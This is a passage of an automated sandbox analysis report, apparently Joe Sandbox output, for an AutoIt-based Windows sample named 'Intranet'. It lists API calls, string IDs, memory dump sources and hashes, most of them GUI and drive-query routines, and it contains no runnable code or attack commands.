• SendMessageW.USER32(00000000,00000401,00000000,00640000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517E44
• SendMessageW.USER32(00000404,00000001,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517E55
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00517E85
• GetStockObject.GDI32(00000011,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517E90
• SendMessageW.USER32(00000030,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517E9B
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517EA5
Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 83703ab226b7e10b9ad56bd3aad7493a6e07db488da0230c6f1c55bac00a4c62
                                                                            • Instruction ID: eb642e734a36a3c4bd918eddfa7107bb0dd64de5a1ead9553c20a3ef0d1cb403
                                                                            • Opcode Fuzzy Hash: 83703ab226b7e10b9ad56bd3aad7493a6e07db488da0230c6f1c55bac00a4c62
                                                                            • Instruction Fuzzy Hash: B9A1A271A00209BFEB14DBA9DC5AFAF7BB9EB18714F004104FA14A72E0C7B4AD44DB64
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050B361
                                                                            • GetDriveTypeW.KERNEL32(?,00532C4C,?,\\.\,00530980), ref: 0050B43E
                                                                            • SetErrorMode.KERNEL32(00000000,00532C4C,?,\\.\,00530980), ref: 0050B59C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 8b4b58ea50cc72194f68a022b69c3ecac03a877a8bb665bca8d6d4d3fbdb0357
                                                                            • Instruction ID: d71a025c301fed0e9d2f285015f15cf2cda2e67a5513670ebe6a2f65ca766fd1
                                                                            • Opcode Fuzzy Hash: 8b4b58ea50cc72194f68a022b69c3ecac03a877a8bb665bca8d6d4d3fbdb0357
                                                                            • Instruction Fuzzy Hash: 5B51D730B80209EBEB00DB20DEE69BD7FA1FB88345B244457F802A72D1E775AE45CB55
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0052A0F7
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0052A1B0
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0052A1CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: e50a91286611b4b2672b94a95f357269d4d41fa72c7bd2f81c659eb132d2b62b
                                                                            • Instruction ID: 2fbe93c8f3f8a054f385bc53c717134a2e60e85d3db5cb4b13b43aa95cd1e61a
                                                                            • Opcode Fuzzy Hash: e50a91286611b4b2672b94a95f357269d4d41fa72c7bd2f81c659eb132d2b62b
                                                                            • Instruction Fuzzy Hash: 99020E30208321AFDB15CF14E849BAABFE4FF9A714F04891DF995862E1C774D848DB92
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052AF51
                                                                            • SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000), ref: 0052AF55
                                                                            • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF6B
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF76
                                                                            • CreateSolidBrush.GDI32(?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF7B
                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF93
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFA1
                                                                            • SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFB2
                                                                            • SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFBB
                                                                            • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFC8
                                                                            • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFE7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052AFFE
                                                                            • GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B013
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052B05F
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B086
                                                                            • InflateRect.USER32(?,000000FD,000000FD,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052B0A4
                                                                            • DrawFocusRect.USER32(?,?,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052B0AF
                                                                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0BD
                                                                            • SetTextColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0C5
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0D9
                                                                            • SelectObject.GDI32(?,0052AC1F,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0F0
                                                                            • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B0FB
                                                                            • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B101
                                                                            • DeleteObject.GDI32(?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B106
                                                                            • SetTextColor.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B10C
                                                                            • SetBkColor.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F), ref: 0052B116
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 8a41b0b14fe3c1ce7fe50fbedfff6b6509045a6b67ba0974732b6ae78f24150a
                                                                            • Instruction ID: 2c8346dd0e1a3743646decc21780febc8680d06df8d6bc11955004943704fe10
                                                                            • Opcode Fuzzy Hash: 8a41b0b14fe3c1ce7fe50fbedfff6b6509045a6b67ba0974732b6ae78f24150a
                                                                            • Instruction Fuzzy Hash: 43615972900218AFDB119FA4EC48AAEBFB9FF09320F105115F925AB2E1D7759944DF90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E,?,?,?,?,?), ref: 005290EA
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005290FB
                                                                            • CharNextW.USER32(0000014E), ref: 0052912A
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0052916B
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158,?,0000014E,005677C4), ref: 00529181
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00529192
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E,?,?,?,?,?), ref: 005291AF
                                                                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 005291FB
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00529211
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00529242
                                                                            • _memset.LIBCMT ref: 00529267
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004,00000000,0000014E,005677C4), ref: 005292B0
                                                                            • _memset.LIBCMT ref: 0052930F
                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00529339
                                                                            • SendMessageW.USER32(?,00001074,?,00000001,00000000,0000014E,005677C4), ref: 00529391
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0052943E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00529460
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005294AA
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005294D7
                                                                            • DrawMenuBar.USER32(?), ref: 005294E6
                                                                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0052950E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: bb4f59f57fe25fbf9bbed36b7e38d094cbd5daefe2f60b86b66ea56fd84e3940
                                                                            • Instruction ID: 9898971cfba92ffb7892c316b3ef328ec4bfbbdbf6f67852f02c41415364b5e4
                                                                            • Opcode Fuzzy Hash: bb4f59f57fe25fbf9bbed36b7e38d094cbd5daefe2f60b86b66ea56fd84e3940
                                                                            • Instruction Fuzzy Hash: 2FE19C74900229AFDB219F55DC88EEE7FB8FF0A714F00815AF915AA2D0D7748A85DF60
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00525007
                                                                            • GetDesktopWindow.USER32(?), ref: 0052501C
                                                                            • GetWindowRect.USER32(00000000), ref: 00525023
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00525085
                                                                            • DestroyWindow.USER32(?), ref: 005250B1
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005250DA
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005250F8
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0052511E
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00525133
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00525146
                                                                            • IsWindowVisible.USER32(?), ref: 00525166
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00525181
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00525195
                                                                            • GetWindowRect.USER32(?,?), ref: 005251AD
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 005251D3
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 005251ED
                                                                            • CopyRect.USER32(?,?), ref: 00525204
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0052526F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 372381596ab03b922feeb58d5927c64af6916bd6c15dfba155ee46e7a57966e1
                                                                            • Instruction ID: decc3d0a694db52ed3b92239c50a38c581956418673c8377bdefe528f1ce446f
                                                                            • Opcode Fuzzy Hash: 372381596ab03b922feeb58d5927c64af6916bd6c15dfba155ee46e7a57966e1
                                                                            • Instruction Fuzzy Hash: FDB1AB71604710AFD704DF64D989B6ABBE4BF8A314F008A1DF5999B2D1E770E804CB96
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0050499C
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005049C2
                                                                            • _wcscpy.LIBCMT ref: 005049F0
                                                                            • _wcscmp.LIBCMT ref: 005049FB
                                                                            • _wcscat.LIBCMT ref: 00504A11
                                                                            • _wcsstr.LIBCMT ref: 00504A1C
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00504A38
                                                                            • _wcscat.LIBCMT ref: 00504A81
                                                                            • _wcscat.LIBCMT ref: 00504A88
                                                                            • _wcsncpy.LIBCMT ref: 00504AB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A2C8C
• GetSystemMetrics.USER32(00000007), ref: 004A2C94
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004A2CBF
• GetSystemMetrics.USER32(00000008), ref: 004A2CC7
• GetSystemMetrics.USER32(00000004), ref: 004A2CEC
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004A2D09
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004A2D19
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004A2D4C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004A2D60
• GetClientRect.USER32(00000000,000000FF), ref: 004A2D7E
• GetStockObject.GDI32(00000011,00000000), ref: 004A2D9A
• SendMessageW.USER32(00000000,00000030,00000000), ref: 004A2DA5
  • Part of subcall function 004A2714: GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
  • Part of subcall function 004A2714: ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
  • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
  • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
• SetTimer.USER32(00000000,00000000,00000028,004A13C7,00000000,000000FF), ref: 004A2DCC
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
APIs
  • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
• GetForegroundWindow.USER32(00530980,?,?,?,?,?), ref: 004C04E3
• IsWindow.USER32(?,?,?,?,00530980,?,?,00000000,00530980), ref: 004F66BB
Strings
Similarity
• API ID: Window$Foreground_memmove
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 3828923867-1919597938
APIs
• CharUpperBuffW.USER32(?,?), ref: 005244AC
• SendMessageW.USER32(?,00001032,00000000,00000000,00530980), ref: 0052456C
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 005156E1
• LoadCursorW.USER32(00000000,00007F8A), ref: 005156EC
• LoadCursorW.USER32(00000000,00007F00), ref: 005156F7
• LoadCursorW.USER32(00000000,00007F03), ref: 00515702
• LoadCursorW.USER32(00000000,00007F8B), ref: 0051570D
• LoadCursorW.USER32(00000000,00007F01), ref: 00515718
• LoadCursorW.USER32(00000000,00007F81), ref: 00515723
• LoadCursorW.USER32(00000000,00007F88), ref: 0051572E
• LoadCursorW.USER32(00000000,00007F80), ref: 00515739
• LoadCursorW.USER32(00000000,00007F86), ref: 00515744
• LoadCursorW.USER32(00000000,00007F83), ref: 0051574F
• LoadCursorW.USER32(00000000,00007F85), ref: 0051575A
• LoadCursorW.USER32(00000000,00007F82), ref: 00515765
• LoadCursorW.USER32(00000000,00007F84), ref: 00515770
• LoadCursorW.USER32(00000000,00007F04), ref: 0051577B
• LoadCursorW.USER32(00000000,00007F02), ref: 00515786
• GetCursorInfo.USER32(?), ref: 00515796
• GetLastError.KERNEL32(00000001,00000000), ref: 005157C1
Similarity
• API ID: Cursor$Load$ErrorInfoLast
• String ID:
• API String ID: 3215588206-0
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 004FB17B
• __swprintf.LIBCMT ref: 004FB21C
• _wcscmp.LIBCMT ref: 004FB22F
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?,00000202,?), ref: 004FB284
• _wcscmp.LIBCMT ref: 004FB2C0
• GetClassNameW.USER32(?,?,00000400), ref: 004FB2F7
• GetDlgCtrlID.USER32(?), ref: 004FB349
• GetWindowRect.USER32(?,?), ref: 004FB37F
• GetParent.USER32(?,?), ref: 004FB39D
• ScreenToClient.USER32(00000000), ref: 004FB3A4
• GetClassNameW.USER32(?,?,00000100), ref: 004FB41E
• _wcscmp.LIBCMT ref: 004FB432
• GetWindowTextW.USER32(?,?,00000400), ref: 004FB458
• _wcscmp.LIBCMT ref: 004FB46C
  • Part of subcall function 004C385C: _iswctype.LIBCMT ref: 004C3864
Strings
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
• String ID: %s%u
• API String ID: 3744389584-679674701
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 004FBAB1
• _wcscmp.LIBCMT ref: 004FBAC2
• GetWindowTextW.USER32(00000001,?,00000400), ref: 004FBAEA
• CharUpperBuffW.USER32(?,00000000), ref: 004FBB07
• _wcscmp.LIBCMT ref: 004FBB25
• _wcsstr.LIBCMT ref: 004FBB36
• GetClassNameW.USER32(00000018,?,00000400), ref: 004FBB6E
• _wcscmp.LIBCMT ref: 004FBB7E
• GetWindowTextW.USER32(00000002,?,00000400), ref: 004FBBA5
• GetClassNameW.USER32(00000018,?,00000400,?,?), ref: 004FBBEE
• _wcscmp.LIBCMT ref: 004FBBFE
• GetClassNameW.USER32(00000010,?,00000400), ref: 004FBC26
• GetWindowRect.USER32(00000004,?), ref: 004FBC8F
Strings
Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
APIs
• LoadIconW.USER32(00000063), ref: 004FCBAA
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004FCBBC
• SetWindowTextW.USER32(?,?), ref: 004FCBD3
• GetDlgItem.USER32(?,000003EA), ref: 004FCBE8
• SetWindowTextW.USER32(00000000,?), ref: 004FCBEE
• GetDlgItem.USER32(?,000003E9), ref: 004FCBFE
• SetWindowTextW.USER32(00000000,?), ref: 004FCC04
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004FCC25
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004FCC3F
• GetWindowRect.USER32(?,?), ref: 004FCC48
• SetWindowTextW.USER32(?,?), ref: 004FCCB3
• GetDesktopWindow.USER32(?), ref: 004FCCB9
• GetWindowRect.USER32(00000000), ref: 004FCCC0
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004FCD0C
• GetClientRect.USER32(?,?), ref: 004FCD19
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004FCD3E
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004FCD69
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: dedc3fd3e1fc2de8256f80c0abcc0319f2ba7abb9c1f27fed6031f443180a29c
                                                                            • Instruction ID: fec8d18a08115a11e12c23111638243bc92304f55ee33cb9bd91f00d797c5c41
                                                                            • Opcode Fuzzy Hash: dedc3fd3e1fc2de8256f80c0abcc0319f2ba7abb9c1f27fed6031f443180a29c
                                                                            • Instruction Fuzzy Hash: D1516F7090070DEFDB209FA8DE86B6FBBF5FF04705F000919E686A26A0C775A914DB54
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052A87E
                                                                            • DestroyWindow.USER32(00000000,?), ref: 0052A8F8
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0052A972
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030,?), ref: 0052A994
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052A9A7
                                                                            • DestroyWindow.USER32(00000000), ref: 0052A9C9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 0052AA00
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052AA19
                                                                            • GetDesktopWindow.USER32(?,?), ref: 0052AA32
                                                                            • GetWindowRect.USER32(00000000), ref: 0052AA39
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0052AA51
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0052AA69
